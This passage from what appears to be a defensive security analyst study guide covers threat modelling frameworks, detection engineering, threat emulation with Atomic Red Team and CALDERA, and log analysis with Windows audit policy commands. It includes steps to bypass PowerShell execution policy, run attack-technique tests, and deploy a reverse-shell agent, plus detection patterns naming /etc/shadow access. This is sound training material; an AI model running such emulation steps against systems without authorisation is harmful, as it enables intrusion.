Continuously test and monitor the effectiveness of the
implemented countermeasures and evaluate the success of
the threat modelling exercise. An example of a simple
measurement of success is tracking the identified risks
that have been effectively mitigated or eliminated.
Threat Modeling Team
Security Team
The overarching team of red and blue teams. This team
typically lead the threat modelling process, providing
expertise on threats, vulnerabilities, and risk mitigation
strategies. They also ensure security measures are
implemented, validated, and continuously monitored.
Development Team
The development team is responsible for building secure
systems and applications. Their involvement ensures that
security is always incorporated throughout the
development lifecycle.|
IT and Operations Team
IT and Operations teams manage the organization's
infrastructure, including networks, servers, and other
critical systems. Their knowledge of network
infrastructure, system configurations and application
integrations is essential for effective threat modelling.
Governance, Risk and Compliance Team
The GRC team is responsible for organization-wide
                            195 / 547
                            HTB CDSA
compliance assessments based on industry regulations and
internal policies. They collaborate with the security team
to align threat modelling with the organisation's risk
management objectives.|
Business Stakeholders
The business stakeholders provide valuable input on the
organisation's critical assets, business processes, and
risk tolerance. Their involvement ensures that the efforts
align with the organization's strategic goals.
End Users
As direct users of a system or application, end users can
provide unique insights and perspectives that other teams
may not have, enabling the identification of vulnerabilities
and risks specific to user interactions and behaviours.
Microsoft Threat Modeling Tool
To download the Microsoft Threat Modeling Tool, visit
Threat Modeling Tool.
You can also download a sample model from the link
below:
 https://d3c33hcgiwev3.cloudfront.net/8GlSo7jMR
 ka5DlQGamTdog_b69ce013413949f9b6516549cd90f5e1
 _Sample_Threat-Model_https.tm7?
 Expires=1718150400&Signature=VS-
 9wxdP1jHJI4X9ECkWnClZ4Wmo0ywoZWMSxMaq0tvrF8NMq
 -
 wCqso8SSaW4IVES086hbnEfamn8k90IAczFQh69xy8~mzE
 e9vQ-
 IC7KpeO8RnKItU0Q~4PTy0uDnAjheRFNGzoERRHud-
                            196 / 547
                              HTB CDSA
 nrO04Rn9cV3YPFOEh2lG0xRjWnUA_&Key-Pair-
 Id=APKAJLTNE6QMUY6HBC5A
Usage
   1. Use the Microsoft Threat Modeling Tool.
   2. Select Open a Model and navigate to the
      Sample_Threat Model_https.tm7 file you
        downloaded earlier.
   3. Notice that there is a Stencils panel on the right of
      the screen. Stencils are used to add components to
        a diagram. Explore the components used in the
        model to make sure you understand the diagram.
   4. Switch to Analysis View by selecting the Switch to
      Analysis View button in the toolbar in the top left
        corner of the screen (page with magnifying glass
                              197 / 547
                       HTB CDSA
   icon)
5. Notice that the Threat List panel now shows the
   possible threats in a list below the diagram. Select
   one of the threats in the list to view the Threat
   Properties panel that contains additional information
   about the specific threat.
                        198 / 547
                       HTB CDSA
Title, Category, and Description fields: You can enter
essential information about the threat in these
fields.
Justification field: In this field, you can enter
information about why you choose to accept or reject
a particular threat. This information can be helpful
for other team members who are reviewing the
threat model, as well as for future reference.
Priority box: Here, you can set the priority of the
threat to High, Medium, or Low.
                       199 / 547
                       HTB CDSA
 Team box: You can assign a threat to a specific
 team here.
 Status box: Here, you can set the threat status to
 Not Started, Needs Investigation, Not Applicable, or
 Mitigated.
6. You can download the threat list as a CSV file by
   selecting Export CSV. This gives you a structured
   and easily accessible record of identified threats
   that you can share with stakeholders who do not
   have the Microsoft Threat Modeling tool installed. A
   popup window will appear. Select the
   Countermeasure, Risk, and Team options and then
   Generate Report.
                        200 / 547
                           HTB CDSA
Threat Modeling Frameworks
PASTA
Definition
PASTA, or Process for Attack Simulation and Threat
Analysis, is a structured, risk-centric threat modelling
framework designed to help organizations identify and
                            201 / 547
                             HTB CDSA
evaluate security threats and vulnerabilities within their
systems, applications, or infrastructure. PASTA provides a
systematic, seven-step process that enables security
teams to understand potential attack scenarios better,
assess the likelihood and impact of threats, and prioritise
remediation efforts accordingly.
PASTA is an excellent framework for aligning threat
modelling with business objectives. Unlike other
frameworks, PASTA integrates business context, making it
a more holistic and adaptable choice for organisations
Components
    1.   Define the Objectives
         Establish the scope of the threat modelling exercise
         by identifying the systems, applications, or
         networks being analysed and the specific security
         objectives and compliance requirements to be met.
    2.   Define the Technical Scope
         Create an inventory of assets, such as hardware,
         software, and data, and develop a clear
         understanding of the system's architecture,
         dependencies, and data flows.
    3.   Decompose the Application
         Break down the system into its components,
         identifying entry points, trust boundaries, and
         potential attack surfaces. This step also includes
         mapping out data flows and understanding user
         roles and privileges within the system.
    4.   Analyze the Threats
         Identify potential threats to the system by
         considering various threat sources, such as
         external attackers, insider threats, and accidental
                             202 / 547
                             HTB CDSA
        exposures. This step often involves leveraging
        industry-standard threat classification frameworks
        or attack libraries.
   5.   Vulnerabilities and Weaknesses Analysis
        Analyze the system for existing vulnerabilities,
        such as misconfigurations, software bugs, or
        unpatched systems, that an attacker could exploit
        to achieve their objectives. Vulnerability
        assessment tools and techniques, such as static
        and dynamic code analysis or penetration testing,
        can be employed during this step.
   6.   Analyze the Attacks
        Simulate potential attack scenarios and evaluate
        the likelihood and impact of each threat. This step
        helps determine the risk level associated with each
        identified threat, allowing security teams to
        prioritize the most significant risks.
   7.   Risk and Impact Analysis
        Develop and implement appropriate security controls
        and countermeasures to address the identified
        risks, such as updating software, applying
        patches, or implementing access controls. The
        chosen countermeasures should be aligned with the
        organisation's risk tolerance and security
        objectives.
STRIDE
Definition and Components
The STRIDE framework is a threat modelling methodology
also developed by Microsoft, which helps identify and
categorize potential security threats in software
development and system design.
                             203 / 547
                           HTB CDSA
STRIDE shines in its structure and methodology, allowing
for a systematic review of threats specific to software
systems.
Components
Spoofing
Unauthorized access or impersonation of a user or
system.
#Examples
     Sending an email as another user.
     Creating a phishing website mimicking a legitimate
     one to harvest user credentials.
     Tampering
     Unauthorized modification or manipulation of data or
     code.
     #Examples
     Updating the password of another user.
     Installing system-wide backdoors using an elevated
     access.
     Repudiation
     Ability to deny having acted, typically due to
     insufficient auditing or logging.
     #Examples
     Denying unauthorised money-transfer transactions,
     wherein the system lacks auditing.
     Denying sending an offensive message to another
     person, wherein the person lacks proof of receiving
     one.
     Information Disclosure
     Unauthorized access to sensitive information, such
     as personal or financial data.
     #Examples
                           204 / 547
                               HTB CDSA
     Unauthenticated access to a misconfigured database
     that contains sensitive customer information.
     Accessing public cloud storage that handles sensitive
     documents.
      Denial of Service
     Disruption of the system's availability, preventing
     legitimate users from accessing it.
     #Examples
     Flooding a web server with many requests,
     overwhelming its resources, and making it
     unavailable to legitimate users.
     Deploying a ransomware that encrypts all system
     data that prevents other systems from accessing the
     resources the compromised server needs.
      Elevation of Privilege
     Unauthorized elevation of access privileges, allowing
     threat actors to perform unintended actions.
     #Examples
     Creating a regular user but being able to access the
     administrator console.
     Gaining local administrator privileges on a machine by
     abusing unpatched systems.
DREAD Framework
Definition
The DREAD framework is a risk assessment model
developed by Microsoft to evaluate and prioritize security
threats and vulnerabilities.
DREAD offers a more numerical and calculated approach to
threat analysis than STRIDE or MITRE ATT&CK, making it
excellent for clearly prioritizing threats.
                               205 / 547
                             HTB CDSA
How it works
We can explain how Dread works by explaining the
acronyms that compose its name
Damage
How bad would an attack be?
The potential harm that could result from the successful
exploitation of a vulnerability. This includes data loss,
system downtime, or reputational damage.
Reproducibility
How easy is it to reproduce the attack?
The ease with which an attacker can successfully recreate
the exploitation of a vulnerability. A higher reproducibility
score suggests that the vulnerability is straightforward to
abuse, posing a greater risk.
Exploitability
How much work is it to launch the attack?
The difficulty level involved in exploiting the vulnerability
considering factors such as technical skills required,
availability of tools or exploits, and the amount of time it
would take to exploit the vulnerability successfully.
Affected Users
How many people will be impacted?
The number or portion of users impacted once the
vulnerability has been exploited.
Discoverability
How easy is it to discover the vulnerability?
The ease with which an attacker can find and identify the
vulnerability considering whether it is publicly known or
how difficult it is to discover based on the exposure of
the assets (publicly reachable or in a regulated
environment).
Putting it into practice
                             206 / 547
                            HTB CDSA
The DREAD Framework is typically used for
Qualitative Risk Analysis, rating each category from
one to ten based on a subjective assessment and
interpretation of the questions above. Moreover, the
average score of all criteria will calculate the overall
DREAD risk rating.
Damage
 0 – Indicates no damage caused to the
 organization
 5 – Information disclosure said to have
 occurred
 8 – Non-sensitive user data has been
 compromised
 9 – Non-sensitive administrative data has been
 compromised
 10 – The entire information system has been
 destructed. All data and applications are
 inaccessible
Reproducibility
 0 – Difficult to replicate the attack
 5 – Complex to replicate the attack
 7.5 – Easy to replicate the attack
 10 – Very easy to replicate the attack
Exploitability
                             207 / 547
                     HTB CDSA
2.5 – Indicates that advanced programming and
networking skills needed to exploit the
vulnerability
5 – Available attack tools needed to exploit
the vulnerability
9 – Web application proxies are needed to
exploit the vulnerability
10 – Indicates the requirement of a web
browser needed to exploit the vulnerability
Affected Users
0 – no users affected
2.5 – Indicates chances of fewer individual
users affected
6 – Few users affected
8 – Administrative users affected
10 – All users affected
Discoverability
2.5 – Indicates it’s hard to discover the
vulnerability
5 – HTTP requests can uncover the
vulnerability
8 – Vulnerability found in the public domain
10 – Vulnerability found in web address bar
or form
                     208 / 547
                           HTB CDSA
Detection Engineering
Definition
Detection engineering is the continuous process of building
and operating threat intelligence analytics to identify
potentially malicious activity or misconfigurations that may
affect your environment. It requires a cultural shift with
the alignment of all security teams and management to
build effective threat-rich defense systems.
Detection of threats can be Environment-based detection
which focuses on looking at changes in an environment
based on configurations and baseline activities that have
been defined and can also be threat-based detection
which focuses on elements associated with an
adversary’s activity, such as tactics, tools and artefacts
that would identify their actions.
Creating Detection Rules
Based on the infrastructure setup and SIEM services,
detection rules will need to be written and tested against
the data sources. Detection rules test for abnormal
patterns against logged events. Network traffic would be
assessed via Snort rules, while Yara rules would evaluate
file data.
Tested detection rules must be put into production to be
assessed in a live environment. Over time, the detections
would need to be modified and updated to account for
changes in attack vectors, patterns or environment. This
improves the quality of detections and encourages viewing
detection as an ongoing process.
                            209 / 547
                            HTB CDSA
Threat Emuleation
Definitions
Threat emulation is an intelligence-driven imitation of
real-world attack scenarios and TTPs in a controlled
environment to test, assess and improve an
organization's security defences and response
capabilities. Threat emulation usually relies on intelligence
data retrieved from threat intelligence, incident response
and above all MITRE ATT&CK TTPs to imitate attackers'
behaviors and profiles.
Threat Emulation vs Threat Simulation
Threat emulation is an intelligence-driven impersonation of
real-world attack scenarios and TTPs in a controlled
environment to test, assess and improve an
organization’s security defences and response
capabilities. This means that you seek to behave as the
adversary would. Threat emulation aims to identify and
mitigate security gaps before attackers exploit them.
Emulation can be conducted as a blind operation – mainly
as a Red Team engagement and unannounced to the rest of
the defensive security team – or as a non-blind operation
involving all security teams and ensuring knowledge
sharing.
In contrast, threat simulation commonly represents
adversary functions or behaviour through predefined and
automated attack patterns that pretend to represent an
adversary. This implies that the actions taken during the
exercise will combine TTPs from one or more groups but
not an exact imitation of a particular adversary.
#### Threat Emulation Methodologies
                            210 / 547
                           HTB CDSA
MITRE ATT&CK
The MITRE ATT&CK Framework is an industry-known
knowledge base that provides information about known
adversarial TTPs observed in actual attacks and breaches.
Threat emulation teams can extract many benefits from
integrating ATT&CK with their engagements as it would
make it efficient when writing reports and mitigations
related to the behaviors experimented with.
Atomic Testing
Definition
Atomic Red Team is an open-source project that provides
a framework for performing security testing and threat
emulation. It consists of tools and techniques that can be
used to simulate various types of attacks and security
threats, such as malware, phishing attacks, and network
compromise. The Atomic Red Team aims to help security
professionals assess the effectiveness of their
organization's security controls and incident response
processes and identify areas for improvement.
The Atomic Red Team framework is designed to be modular
and flexible, allowing security professionals to select the
tactics and techniques most relevant to their testing
needs. It is intended to be used with other tools and
frameworks, such as the MITRE ATT&CK framework, which
provides a comprehensive overview of common tactics and
techniques threat actors use.
Components of Atomic Red Team
Atomics refers to different testing techniques based on
the MITRE ATT&CK Framework. Each works as a standalone
testing mock-up that Security Analysts can use to emulate
                           211 / 547
                           HTB CDSA
a specific Technique, such as OS Credential Dumping:
LSASS Memory, for a quick example.
Each Atomic typically contain two files, both of which are
named by their MITRE ATT&CK Technique ID:
     Markdown File (.md) :             – Contains all the
     information about the technique, the supported
     platform, Executor, GUID, and commands to be
     executed.
     YAML File (.yaml) :      – Configuration used by
     frameworks, such as Invoke-Atomic and Atomic-
     Operator, to do the exact emulation of the technique
     Breakdown of the YAML Config file
     The first few fields are already given based on their
     field names:
     attack_technique - MITRE ATT&CK Technique ID,
     which also signifies the file's name.
     display_name - The technique name, similar to how
     it is presented as a MITRE Technique.
     atomic_tests - List of atomic tests, which details
     how every test is executed.
     The following section details the contents of a single
     Atomic Test under the list of atomic_tests field:
     name - Short snippet that describes how it tests the
     technique.
     auto_generated_guid - Unique identifier of the
     specific test.
     description - A longer form of the test details and
     can be written in a multi-line format.
     supported_platforms - On what platform will the
     technique be executed (on a Windows machine in this
     case)
                           212 / 547
                      HTB CDSA
input_arguments - Required values during the
execution, resorts to the default value if nothing is
supplied.
To conclude with the contents of an Atomic test,
details about dependencies and executors are as
follows:
dependency_executor_name - Option on how the
prerequisites will be validated. The possible values
for this field are similar to the Executor field.
dependencies
prereq_command:- Commands to check if the
requirements for running this test are met. The
conditions for the "commandprompt" Executor are
not satisfied if any command returns a non-zero
exit code. For the "Powershell" Executor, all
commands are run as a script block, and the
script block must return 0 for success.
_get_prereq_command: - Commands to meet this
prerequisite or a message describing how to meet
this requirement.
executor
name: Name of the Executor; similar to what has
been discussed above.
command: Exact command to emulate the technique.
cleanup_command: Commands for cleaning up the
previous atomic test, such as deletion of files or
reverting modified configurations.
elevation_required: A boolean value that dictates if
an admin privilege is required.
Invoke-AtomicRedTeam
Invoke-AtomicRedTeam is a PowerShell module
created by the same author (Red Canary) that allows
                       213 / 547
                               HTB CDSA
      Security Analysts to run simulations defined by
      Atomics. To avoid confusion, the primary cmdlet
                           Invoke-AtomicTest
      used in this module is                        and
      not   Invoke-AtomicRedTeam .
      Setup steps
      After downloading and cloning, execute the below
      command to bypass the Powershell execution policy
 PS C:\Users\Administrator>powershell -
 ExecutionPolicy bypass
Import the module
 PS C:\Users\Administrator> Import-Module
 "C:\Tools\invoke-atomicredteam\Invoke-
 AtomicRedTeam.psd1" -Force
Verify its working
 PS C:\Users\Administrator> help Invoke-
 AtomicTest
Steps to conduct security testing and threat emulation
with Invoke-AtomicRedTeam
Before executing any technique found in the directory of
the atomics, its always recommended to get first hand
information about how it works and what are the
commands that the technique executes:
[1]   -ShowDetailsBrief
                               214 / 547
                            HTB CDSA
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -ShowDetailsBrief
 #output
 PathToAtomicsFolder =
 C:\Tools\AtomicRedTeam\atomics
 T1127-1 Lolbin Jsc.exe compile javascript to
 exe T1127-2 Lolbin Jsc.exe compile javascript
 to dll
[2]   -ShowDetails
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -ShowDetails
After getting familiar with the technique, you can then
find out if any prerequisites are needed to be installed for
the technique to work
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -CheckPrereqs
 PathToAtomicsFolder =
 C:\Tools\AtomicRedTeam\atomics
 #output
 CheckPrereq's for: T1127-1 Lolbin Jsc.exe
 compile javascript to exe
 Prerequisites met: T1127-1 Lolbin Jsc.exe
                            215 / 547
                            HTB CDSA
 compile javascript to exe
 CheckPrereq's for:      T1127-2 Lolbin Jsc.exe
 compile javascript      to dll
 Prerequisites met:      T1127-2 Lolbin Jsc.exe
 compile javascript      to dll
If the required binaries, files or scripts do not exist in the
machine, the   GetPrereqs      parameter can be used. This
parameter automatically pulls the dependencies from an
external resource. It also details what conditions are
being attempted to satisfy and confirms if the prerequisite
is already met.
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -GetPrereqs
You can then proceed and choose how many tests (if the
atomic includes more than one test technique) you want
to execute
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1053.005 -TestNumbers 1,2
To execute all tests in an atomic:
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1053.005
Lastly, cleaning up the mess of emulating different
techniques is VERY IMPORTANT. The Invoke-AtomicRedTeam
                             216 / 547
                           HTB CDSA
module also has the option to execute the cleanup
commands to revert every footprint left by the tests. This
can be done by using the Cleanup parameter.
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1053.005 -TestNumbers 1,2 -Cleanup
TIBER-EU Framework
The Threat Intelligence-based Ethical Red Teaming (TIBER-
EU) is the European framework developed to deliver
controlled, bespoke, intelligence-led emulation testing on
entities and organizations’ critical live production
systems. It is meant to provide a guideline for
stakeholders to test and improve cyber resilience through
controlled adversary actions.
CTID Adversary Emulation Library
The Center for Threat-Informed Defense is a non-profit
research and development organization operated by MITRE
Engenuity. Its mission is to promote the practice of
threat-informed defence. With this mission, they have
curated an open-source adversary emulation plan library,
allowing organisations to use the plans to evaluate their
capabilities against real-world threats.
CALDERA
Definition
CALDERA™ is an open-source framework designed to run
autonomous adversary emulation exercises efficiently. It
enables users to emulate real-world attack scenarios and
                            217 / 547
                            HTB CDSA
assess the effectiveness of their security defences.
Additionally,blue teamers can also use CALDERA to perform
automated incident response actions through deployed
agents. This functionality aids in identifying TTPs that
other security tools may not detect or prevent.
Components
    1. Agents are programs continuously connecting to
       the CALDERA server to pull and execute
       instructions.
    2. Abilities are TTP implementations, which the
       agents execute. Abilities include the commands
       that will be executed, payloads, platforms and
       other references.
    3. Adversaries are groups of abilities that are
       attributed to a known threat group. The adversary
       profiles define which set of abilities will be
       executed, and agent groups determine which
       agents these abilities will be performed.
    4. Operations run abilities on agent groups.
    5. Plugins provide additional functionality over the
       core usage of the framework.
    6. Planner: Determine the order of abilities to be
       executed based on several factors such as     atomic
       order    in which abilities are executed based on the
       atomic ordering (Atomic of Atomic Red Team). The
       other factor is called   batch order    in which
       abilities are executed all at once and the last one
       is   buckets order   in which abilities are grouped
       and executed by its ATT&CK tactic.
Running & Using Caldera
Once you decide the machine on which you want Caldera
                            218 / 547
                              HTB CDSA
installed, you can start and run Caldera using the below
commands on Linux:
 source ../caldera_venv/bin/activate
 python3 server.py --insecure
                        source
Note that we have executed
../caldera_venv/bin/activate , which          indicates that
we are using a Python virtual environment to load all
modules required by CALDERA.
Deploying Agents
To deploy an agent, navigate to the agent's tab by
clicking the agents button in the sidebar. Then select an
appropriate agent from the list based on your target OS.
Next, ensure that the IP Address in the configuration is
set to your Cadera's machine IP Address since the default
value is set to   0.0.0.0 .   Doing this will ensure the agent
will communicate back to your CALDERA instance.
Lastly, copy the first set of commands from your CALDERA
instance to establish a reverse-shell agent
via TCP contact and execute them via PowerShell inside
the provided victim server.
                              219 / 547
                           HTB CDSA
Once done, an agent will spawn in the agent tab showing
that the executed PowerShell commands yielded a
successful result.
Choosing an Adversary Profile to Emulate
Navigate to the adversaries tab via the sidebar and use
the search functionality to choose a profile.
Starting an Operation
Navigate to the operations tab via the sidebar and click
Create Operation. Fill up the details and expand the
configuration by clicking Advanced.
                            220 / 547
                            HTB CDSA
You may need to take note of three things in creating an
operation:
     First, you must select the suitable Adversary Profile.
     Next, you should select the right group. By selecting
     red, you will only execute the abilities using
     the red agents and prevent running the operation on
     blue agents if there are any.
     Lastly, the commands will be executed without
     obfuscation.
     Once configured, start the operation by
     clicking Start. You may observe that the agent
     executes the list of abilities individually.
     You can also choose to run the abilities individually
     instead of running everything immediately.
     The only difference from our previous setup is that
     the Run State is set to Pause on Start instead of
     Run immediately.
     With this new configuration, you may see that the
     operation is paused upon start. Given this, we can
     use the Run 1 Link feature to execute a single ability
     at a time.
                             221 / 547
                       HTB CDSA
Autonomous Incident Response
Dashboard
Response Plugin
The Response plugin is the counterpart of the threat
emulation plugins of CALDERA. It mainly contains
abilities that focus on detection and response
actions. You may view the summary of the response
plugin by navigating to the response tab in the
sidebar.
You may view the abilities available for the plugin by
navigating to the abilities tab and filtering it with the
response plugin, similar to the image below.
                       222 / 547
                            HTB CDSA
   Compared to the adversaries' abilities that are
   mapped with MITRE ATT&CK Tactics and Techniques,
   the Response Plugin Abilities are classified by four
   different tactics, such as:
   Setup    - Abilities that prepare information, such as
   baselines, that assists other abilities in determining
   outliers.
   Detect      - Abilities that focus on finding suspicious
   behaviour by continuously acquiring information.
   Abilities under this tactic have the Repeatable field
   configured, meaning they will run and hunt as long
   as the operation runs.
   Response       - Abilities that act on behalf of the user
   to initiate actions, such as killing a process,
   modifying firewall rules, or deleting a file.
   Hunt    - Abilities that focus on searching for
   malicious Indicators of Compromise (IOCs) via logs or
   file hashes.
Threat Emulation Steps
   Define Objectives :         The objectives should be
   clearly defined, specific, and measurable.
                            223 / 547
                      HTB CDSA
Research Adversary TTPs :         This step aims to
accurately model the behaviour of the target
adversary so that the emulation team can conduct
the exercise realistically and practically
Planning the Threat Emulation Engagement :             A
well-defined plan will contain the elements of the
threat emulation process as well as the
following components:
Engagement Objectives: We have seen that the
objectives are defined at the beginning of the
process to understand the need for threat emulation.
Scope: The departments, users and devices upon
which emulation activities are permitted should be
defined explicitly.
Schedule: The dates and times when the activities
should occur and when deliverables are due should be
defined. This helps avoid conflicts between emulation
activities and legitimate business operations.
Rules of Engagement: The acceptable adversary
behavior to be emulated must be planned and
discussed. This also includes mitigation actions for
any high-risk TTPs used during the exercise.
Permission to Execute: Explicit written consent to
conduct the emulation activities must be provided by
sufficient authority from the organization. This helps
avoid acting out independently and risking legal or
criminal problems.
Communication Plan: The emulation team and
organization stakeholders must have a plan to
communicate information concerning the emulation
activities. You need to define the timings,
                      224 / 547
                            HTB CDSA
     communication channels, and any collaboration
     efforts to be included.
      Conducting the Emulation :        This step involves
     carrying out the attack using the TTPs identified in
     the research phase.
      Concluding and Reporting :        Once results have
     been obtained, the teams must document and report
     the findings. Documentation provides empirical
     evidence to demonstrate the cyber security
     effectiveness of the process.
Module 3: Log Analysis
Essentials
Understanding Logs
Premise
Following security best practices, it is typical for a
modern environment to employ log forwarding. Log
forwarding means that the SOC will move or “forward”
logs from the host machine to a central server or indexer.
Even if an attacker can delete logs from the host
machine, they could already be off of the device and
secured.
Log entries are often given a severity level to categorize
and communicate their relative importance or impact.
These severity levels help prioritize responses,
investigations, and actions based on the criticality of the
events. Different systems might use slightly different
severity levels, but commonly, you can expect to find the
following increasing severity levels: Informational,
                            225 / 547
                             HTB CDSA
Warning, Error, and Critical.
Log Files
Log files are records of events committed to a file in a
list format. They can include all sorts of information about
events that happened at a particular time. Every device on
the network creates log files, thus giving you a history of
what's been happening.
Logs typically contain five headed-up areas. They are:
     Timestamp –the time of the event.
     Log level – how severe or important the event is.
     Username– who caused the event.
     Service or application – what caused the event.
     Event description – what has happened.
     Log file types
      Event log    –records information about the usage of
     network traffic and tracks login attempts,
     application events, and failed password attempts.
      System log      (or syslog) – records operating system
     events, including startup messages, system
     changes, shutdowns, and errors and warnings.
      Server log      – contains a record of activities in a
     text document related to a specific server over a
     specific period of time.
      Change log      – lists changes made to an application
     or file.
      Availability log       –tracks uptime, availability,
     and system performance.
      Authorization and access log          – lists who is
     accessing applications or files.
     Resource log –provides information on connectivity
     issues and any capacity problems.
                              226 / 547
                            HTB CDSA
      Application Logs     Messages about specific
     applications, including status, errors, warnings,
     etc.
      Audit Logs    Activities related to operational
     procedures crucial for regulatory compliance.
      Security Logs     Security events such as logins,
     permissions changes, firewall activity, etc.
      Network Logs    Network traffic, connections, and
     other network-related events.
      Database Logs     Activities within a database
     system, such as queries and updates.
      Web Server Logs     Requests processed by a web
     server, including URLs, response codes, etc.
Collecting Logs
The process of log collection relies heavily on the
accuracy of your time settings therefore its recommended
to utilize the Network Time Protocol (NTP) to achieve
synchronization and ensure the integrity of the timeline
stored in the logs.
You can do so on Linux system manually by running the
below command
 ntpdate pool.ntp.org
Log collection follows the below steps:
     Source Identification: List all potential log sources,
     such as servers, databases, applications, and
     network devices.
                            227 / 547
                            HTB CDSA
     Choosing a Log Collector: Example is Splunk or
     rsyslog collector or Elastic Stack.
     Configuring Collection Parameters: Ensure that time
     synchronization is enabled through NTP to maintain
     accurate timelines, adjust settings to determine
     which events to log at what intervals, and prioritize
     based on importance.
     Testing: Run a test to ensure logs are appropriately
     collected from all sources.
Example | Log collection using Rsyslog
We can configure Rsyslog to collect specific logs such as
web server logs or ssh logs and forward them to a
specific file.
First ensure Rsyslog is installed on your machine
 sudo systemctl status rsyslog
Next we navigate to the directory where rsyslog holds logs
and create a new log file
 cd /etc/rsyslog.d
 nano apache.logs
Then inside the file, type the below
 $FileCreateMode 0644
 :programname, isequal, "apache"
 /var/log/websrv-02/rsyslog_apache.log
Restart
                            228 / 547
                           HTB CDSA
 sudo systemctl restart rsyslog
Log Management
Log management includes securely storing logs, providing
storage capacity and ensuring swift and quick retrieval of
logs when needed. Also make sure to conform to the
retention period, backup your logs regularly and conduct a
periodic review.
Log Retention & Archival
Define log retention policies and implement them. Don't
forget to create backups of stored log data as well.
Log Analysis
Definition
Log analysis examines and interprets log event data
generated by various data sources (devices, applications,
and systems) to monitor metrics and identify security
incidents.
Log analysis involves several steps that starts with
collecting, parsing, and processing log files to turn data
into actionable objectives. Then analysts would correlate
log data to find links and connections between events to
paint a story of what happened.
Creating a Timeline
A timeline is a chronological representation of the logged
events, ordered based on their occurrence. Creating a
timeline is important to construct the series of events
that eventually led to the security incident which can aid
analysis identify the initial point compromise and
understand the attacker's tactics, techniques and
                            229 / 547
                            HTB CDSA
procedures (TTPs).
Looking for patterns of security incidents
Multiple failed login attempts
Unusually high numbers of failed logins within a short time
may indicate a brute-force attack.
Unusual login times
Login events outside the user's typical access hours
might signal unauthorized access or compromised
accounts.
Geographic anomalies
Login events from IP addresses in countries the user does
not usually access can indicate potential account
compromise or suspicious activity.
In addition, simultaneous logins from different geographic
locations may suggest account sharing or unauthorized
access.
Frequent password changes
Log events indicating that a user's password has been
changed frequently in a short period may suggest an
attempt to hide unauthorized access or take over an
account.
Unusual user-agent strings
In HTTP traffic logs, requests from users with uncommon
user-agent strings that deviate from their typical browser
may indicate automated attacks or malicious activities.
For example, by default, the Nmap scanner will log a user
agent containing "Nmap Scripting Engine."
The Hydra brute-forcing tool by default, will include "
(Hydra)" in its user-agent. These indicators can be useful
in log files to detect potential malicious activity.
Attack Patterns and signatures
SQL Injection
When looking for patterns of SQL Injection, we try to find
                             230 / 547
                            HTB CDSA
evidence of SQL queries in the logs such as UNION SELECT.
Sometimes the SQL Payloads may be URL-encoded,
requiring an additional processing step to identify it
efficiently.
XSS
To identify common XSS attack patterns, it is often
helpful to look for log entries with unexpected or unusual
input that includes script tags and event handlers
(onmouseover, onclick, onerror).
Directory Traversal
To identify common traversal attack patterns, look for
traversal sequence characters (../ and ../../) and
indications of access to sensitive files
(/etc/passwd, /etc/shadow).
Windows Logs Analysis
Premise
Almost all event logging capability within Windows is
handled from ETW (Event Tracing for Windows) at both
the application and kernel level.
Event IDs are a core feature of Windows logging. Events
are sent and transferred in XML(Extensible Markup
Language) format which is the standard for how events
are defined and implemented by providers.
Components of Event Tracing for Windows
ETW is broken up into three separate components, working
together to manage and correlate data. Event logs in
Windows are no different from generic XML data, making
it easy to process and interpret.
From start to finish, events originate from the providers.
Controllers will determine where the data is sent and how
it is processed through sessions. Consumers will save or
                            231 / 547
                            HTB CDSA
deliver logs to be interpreted or analyzed.
Event Controllers       are used to build and configure
sessions. To expand on this definition, we can think of
the controller as the application that determines how and
where data will flow. From the Microsoft docs,
“Controllers are applications that define the size and
location of the log file, start and stop event tracing
sessions, enable providers so they can log events to the
session, manage the size of the buffer pool, and obtain
execution statistics for sessions.”
Event Providers      are used to generate events. To
expand on this definition, the controller will tell the
provider how to operate, then collect logs from its
designated source. From the Microsoft docs, “Providers
are applications that contain event tracing
instrumentation. After a provider registers itself, a
controller can then enable or disable event tracing in the
provider. The provider defines its interpretation of being
enabled or disabled. Generally, an enabled provider
generates events, while a disabled provider does not.”
Event Consumers      are used to interpret events. To
expand on this definition, the consumer will select
sessions and parse events from that session or multiple at
the same time. This is most commonly seen in the “Event
Viewer”. From the Microsoft docs, “Consumers are
applications that select one or more event tracing
sessions as a source of events. A consumer can request
events from multiple event tracing sessions
simultaneously; the system delivers the events in
chronological order. Consumers can receive events stored
in log files, or from sessions that deliver events in real
time.”
Security Log
                             232 / 547
                              HTB CDSA
The Security log functions as a security log, an
audit log, and an access log. It records auditable events
such as successes or failures. Success indicates an
audited event completed successfully, such as a user
logging on or successfully deleting a file. Failure means
that a user tried to perform an action but failed, such as
failing to log on or attempting to delete a file but receiving
a permission error instead.
Application Log
It records events sent to it by applications or programs
running on the system. Any application has the capability
of writing events in the Application log. This includes
warnings, errors, and routine messages.
System Logs
It records
events related to the functioning of the operating system.
This can include when it starts, when it shuts down,
information onservices starting and stopping, drivers
loading or failing, or any other system component event
deemed important by the system developers.
Windows Categorization of Event Messages
     Information: Describes the successful operation of a
     driver, application or service. Basically, a service is
     calling home.
     Warning: Describes an event that may not be a
     present issue but can cause problems in the future.
     Error: Describes a significant problem with a service
     or application.
     Success Audit: Outlines that an audited security
     access operation was successful. For example, a
     user’s successful login to the system.
                              233 / 547
                              HTB CDSA
     Failure Audit: Outlines that an audited security
     access operation failed. For example, a failed
     access to a network drive by a user.
     Location & Format of Event Logs
     The log files' directory can differ according to the
     Windows OS version. MS Windows changed the event
     log file directory/location with Windows Vista.
 C:\WINDOWS\System32\winevt\Logs
File format is evt or evtx.
Enable success and failure logging
on all categories
You should enable logging on all workstations to be able to
collect and analyze logs. The below command enables
logging for all security and system operations in cases of
both success and failure. This would create huge log file
size
 C:\> auditpol /set /category:* /success:enable
 /failure:enable
The below are commands separated by a     new line
demonstrating enabling success and failure events for
different sorts of system and security categories.
 C: \> auditpol /set /subcategory: "Detailed
 File Share" /success:enable /failure:enable
                              234 / 547
                     HTB CDSA
C:\> auditpol /set /subcategory:"File System"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"Security
System Extension" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"System
Integrity" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Security
State
Change" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Other System
Events" /success:enable /failure:enable
